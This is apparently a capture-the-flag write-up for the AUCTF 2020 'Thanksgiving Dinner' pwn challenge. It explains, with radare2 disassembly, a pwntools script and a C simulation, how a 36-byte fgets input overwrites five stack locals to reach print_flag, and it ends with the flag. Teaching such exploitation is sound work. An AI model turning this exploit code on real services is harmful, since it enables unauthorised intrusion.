AUCTF 2020 Writeup - Thanksgiving Dinner

April 19, 2020
ctf writeup pwn x86 auctf2020

Intro

This is the second pwn challenge of AUCTF 2020. It was solved 238 times and it was worth 408 points.

Description:

I just ate a huge dinner. I can barely eat anymore… so please don’t give me too much!

nc challenges.auctf.com 30011

Note: ASLR is disabled for this challenge

You can download the binary here

$ sha256sum ./thanksgiving_dinner
2307af59beead6a2377c3beb2ff26f70d5732ec6b651b5c31e58b8f692bfb70c thanksgiving_dinner

Exploitation

The program simply asks for input. A long line does not crash it, so at first glance it does not look vulnerable to a buffer overflow:

$ ./thanksgiving_dinner
Hi!
Welcome to my program... it's a little buggy...
Hey I heard you are searching for flags! Well I've got one. :)
Here you can have part of it!
auctf{

Sorry that's all I got!

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

So I checked the binary with checksec, then opened it with radare2.

$ checksec ./thanksgiving_dinner
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ r2 -Ad ./thanksgiving_dinner

Then I found two promising functions:

[r2]> afl
.....
0x56556250    7 198          sym.vulnerable
0x56556360    3 162          sym.print_flag
....
[r2]> axt sym.vulnerable
main 0x5655623c [CALL] call sym.vulnerable
[r2]> axt sym.print_flag
sym.vulnerable 0x5655630b [CALL] call sym.print_flag

The vulnerable function is called by main. The print_flag function is called by vulnerable.

So here is the interesting part of vulnerable.

It reads a string with fgets and, if a handful of local variables hold the right values, calls print_flag. The buffer is at ebp-0x2c while the compared locals sit above it at ebp-0x1c through ebp-0xc, and fgets reads up to 0x24 (36) bytes, so a single input line overwrites all of them:

[r2]> pdf @sym.vulnerable
.....
│           0x565562d9      6a24           push 0x24                   ; 36
│           0x565562db      8d45d4         lea eax, [var_2ch]
│           0x565562de      50             push eax
│           0x565562df      e85cfdffff     call sym.imp.fgets
│           0x565562e4      83c410         add esp, 0x10
│           0x565562e7      817df4371300.  cmp dword [var_ch], 0x1337
│       ┌─< 0x565562ee      7520           jne 0x56556310
│       │   0x565562f0      837df0ec       cmp dword [var_10h], 0xffffffec
│      ┌──< 0x565562f4      7d1a           jge 0x56556310
│      ││   0x565562f6      837de814       cmp dword [var_18h], 0x14
│     ┌───< 0x565562fa      7414           je 0x56556310
│     │││   0x565562fc      817dec637466.  cmp dword [var_14h], 0x667463
│    ┌────< 0x56556303      750b           jne 0x56556310
│    ││││   0x56556305      837de42a       cmp dword [var_1ch], 0x2a
│   ┌─────< 0x56556309      7505           jne 0x56556310
│   │││││   0x5655630b      e850000000     call sym.print_flag
│   └└└└└─> 0x56556310      90             nop
│           0x56556311      8b5dfc         mov ebx, dword [var_4h]
│           0x56556314      c9             leave
└           0x56556315      c3             ret

Each cmp is followed by a jump that skips print_flag, so the input has to satisfy all five of these at once:

var_1ch == 0x2a (jne skips)
var_18h != 0x14 (je skips)
var_14h == 0x667463, the bytes "ctf\0" in little-endian (jne skips)
var_10h < 0xffffffec, a signed compare, so anything below -20 (jge skips)
var_ch == 0x1337 (jne skips)

The buffer starts 0x2c - 0x1c = 16 bytes below var_1ch, so 16 bytes of filler followed by the five dwords fill exactly the 0x24 bytes fgets accepts. fgets copies at most 35 bytes and writes a NUL as the 36th, but that byte is the top byte of 0x1337, which is 0 anyway. That is the "don't give me too much" hint: there is no room for a larger overwrite.

So this is my exploit:

#!/usr/bin/env python3

import os
import sys

from pwn import *

# The binary downloaded above (the original script loaded it under a local name, "turkey").
prog = context.binary = ELF(os.getcwd() + "/thanksgiving_dinner", checksec=False)

if len(sys.argv) > 1:
        host = "challenges.auctf.com"
        port = 30011
        t = remote(host, port)
else:
        t = prog.process()

# fgets(buf, 0x24, stdin) writes to ebp-0x2c; var_1ch is at ebp-0x1c,
# so 0x2c - 0x1c = 16 bytes of filler reach the first compared local.
offset = 16
payload = b"A" * offset
payload += p32(0x2a)        # var_1ch: must equal 0x2a
payload += p32(0x15)        # var_18h: must not equal 0x14
payload += p32(0x667463)    # var_14h: must equal "ctf\0"
payload += p32(0xffffffeb)  # var_10h: -21, must be signed-less than -20
payload += p32(0x1337)      # var_ch: must equal 0x1337; its top byte is the
                            # NUL fgets writes as the 36th byte, which is 0 anyway

t.sendline(payload)
t.interactive()
t.close()
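To check the payload without the binary, here is an added example (not part of the original writeup) that models the frame of vulnerable in C from the offsets in the disassembly: the fgets destination followed by the five compared locals, fed through a real fgets(.., 0x24, ..) on an in-memory stream. The struct layout, the field names (radare2's) and the helper names are assumptions made for this model, not recovered from the binary here. It also shows the point the hint is about: fgets always writes the 36th byte as NUL, so only a var_ch value with a zero top byte is reachable.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of vulnerable()'s stack frame, built from the offsets in the
 * disassembly: fgets writes to ebp-0x2c, and the five compared dwords follow.
 * Field names are radare2's. */
struct frame {
    char    var_2ch[16];  /* fgets destination; var_1ch starts 0x2c-0x1c = 16 bytes in */
    int32_t var_1ch;      /* cmp 0x2a,     jne -> must equal 42 */
    int32_t var_18h;      /* cmp 0x14,     je  -> must NOT equal 20 */
    int32_t var_14h;      /* cmp 0x667463, jne -> "ctf\0" little-endian */
    int32_t var_10h;      /* cmp -20,      jge -> must be signed-less than -20 */
    int32_t var_ch;       /* cmp 0x1337,   jne -> must equal 0x1337 */
};
_Static_assert(sizeof(struct frame) == 0x24, "frame must be exactly the fgets size");

/* Same bytes viewed as a raw buffer, so fgets can fill the whole frame. */
union stack {
    struct frame f;
    unsigned char raw[sizeof(struct frame)];
};

/* The comparison chain at 0x565562e7..0x56556309, as C. */
int would_print_flag(const struct frame *f)
{
    return f->var_ch == 0x1337
        && f->var_10h < -20
        && f->var_18h != 0x14
        && f->var_14h == 0x667463
        && f->var_1ch == 0x2a;
}

/* Simulate vulnerable(): fgets(buf, 0x24, stdin), with stdin replaced by an
 * in-memory stream carrying the line the exploit sends.  Returns 1 if
 * print_flag would be reached, 0 if not, -1 on I/O error. */
int run_vulnerable(unsigned char *line, size_t len)
{
    union stack s;
    memset(&s, 0, sizeof s);
    FILE *in = fmemopen(line, len, "r");
    if (!in)
        return -1;
    /* Size 0x24 means fgets copies at most 35 bytes and writes a NUL as the
     * 36th: that NUL lands on the top byte of var_ch. */
    char *ok = fgets((char *)s.raw, 0x24, in);
    fclose(in);
    if (!ok)
        return -1;
    return would_print_flag(&s.f);
}

static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = v & 0xff;
    dst[1] = (v >> 8) & 0xff;
    dst[2] = (v >> 16) & 0xff;
    dst[3] = (v >> 24) & 0xff;
}

/* What t.sendline(payload) puts on the wire: 16 filler bytes, five
 * little-endian dwords, then the newline.  out must hold 37 bytes. */
size_t build_payload(unsigned char *out, int32_t v1c, int32_t v18,
                     int32_t v14, int32_t v10, int32_t vc)
{
    memset(out, 'A', 16);
    put_le32(out + 16, (uint32_t)v1c);
    put_le32(out + 20, (uint32_t)v18);
    put_le32(out + 24, (uint32_t)v14);
    put_le32(out + 28, (uint32_t)v10);
    put_le32(out + 32, (uint32_t)vc);
    out[36] = '\n';
    return 37;
}

/* Build a line for the given values and run it through the model. */
int try_values(int32_t v1c, int32_t v18, int32_t v14, int32_t v10, int32_t vc)
{
    unsigned char line[37];
    size_t n = build_payload(line, v1c, v18, v14, v10, vc);
    return run_vulnerable(line, n);
}

/* The exploit's exact values: 0x2a, 0x15, "ctf", -21, 0x1337. */
int exploit_works(void)
{
    return try_values(0x2a, 0x15, 0x667463, -21, 0x1337);
}

int main(void)
{
    printf("exploit payload reaches print_flag: %d\n", exploit_works());
    printf("same payload with var_18h = 0x14:   %d\n",
           try_values(0x2a, 0x14, 0x667463, -21, 0x1337));
    printf("var_ch with a non-zero top byte:     %d\n",
           try_values(0x2a, 0x15, 0x667463, -21, 0x11111337));
    return 0;
}
```

The last case is the one worth remembering: a value such as 0x11111337 in var_ch fails because fgets overwrites its top byte with the terminator, so the 0x1337 the binary asks for is one of the few dwords that can actually be placed there.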

And this is the flag:

$ cat flag.txt
auctf{I_s@id_1_w@s_fu11!}

thanksgiving dinner solved banner
